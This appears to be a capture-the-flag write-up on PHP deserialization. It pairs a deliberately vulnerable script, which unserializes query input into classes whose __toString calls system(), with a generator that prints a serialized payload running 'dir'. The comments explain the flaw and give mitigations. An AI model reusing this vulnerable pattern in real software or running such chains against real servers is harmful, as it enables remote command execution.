<?php
// Print this file's own source. Intended for the challenge; in any real deployment
// this line would be a source-disclosure issue. show_source() is an alias of highlight_file().
show_source(__FILE__);
class A
{
    public $s;

    /** When the object is released, writes "hello" followed by $s converted to a string. */
    public function __destruct()
    {
        print 'hello' . $this->s;
    }
}
// Gadget sink (deliberately vulnerable challenge code): whenever a B is used in a
// string context, its public $cmd property is handed straight to system(). An object
// that arrives via unserialize() carries whatever $cmd the input specified, so this
// is the command-execution end of the chain. Real code must never pass object state
// to system(); no "sanitising" of a whole command string is adequate.
// NOTE(review): __toString must produce a string. `return 1;` is presumably why the
// second listing below returns "1" instead — on PHP 7 a non-string __toString return
// is an error (raised only after system() has already run); confirm for the PHP in use.
class B{public $cmd;public function __toString(){system($this->cmd);return 1;}
}
// Entry point of the chain and the actual vulnerability: query-string input is
// deserialised with no restriction, so the caller decides which classes (e.g. A and B
// above) are instantiated and what their public properties hold. The result is
// discarded immediately, which is presumably when A::__destruct fires.
// Mitigation for real code: do not unserialize() untrusted data at all — use
// json_decode() — or at minimum pass ['allowed_classes' => false] as the second
// argument so no object (and therefore no magic method) can be created from the input.
unserialize($_GET['code']);
__toString()：当对象被当作字符串使用的时候，自动执行
起点:"hello".$this->s;
终点:system($this->cmd);
跳板:"hello".$this->s;
<?php
// Print this file's own source (show_source() is an alias of highlight_file()).
// Fine for the challenge; in production this would disclose application code.
show_source(__FILE__);
class A
{
    public $s;

    /** On release, outputs the fixed prefix "hello" followed by $s in string form. */
    public function __destruct()
    {
        print 'hello' . $this->s;
    }
}
// Payload-generation half of the write-up: the same two classes, used locally to
// produce the serialized object graph printed after the closing tag. B's __toString
// is the system() sink (see the notes on the first listing); here it returns "1", a string.
// Detection hint for defenders: a serialized blob containing a nested object
// (`O:` inside `O:`) of classes that define magic methods is a pattern worth alerting on.
class B{public $cmd;public function __toString(){system($this->cmd);return "1";}
}$a = new A(); // outer object: A::__destruct runs "hello".$this->s when $a is released (at script end, so running this generator itself also triggers B::__toString)
$b = new B();
$b->cmd='dir'; // the string B::__toString passes to system(); 'dir' only lists a directory
$a->s=$b; // nesting B under A::$s is what turns the concatenation into a B::__toString call
echo serialize($a); // prints the serialized graph shown below
?>O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}
执行结果如下: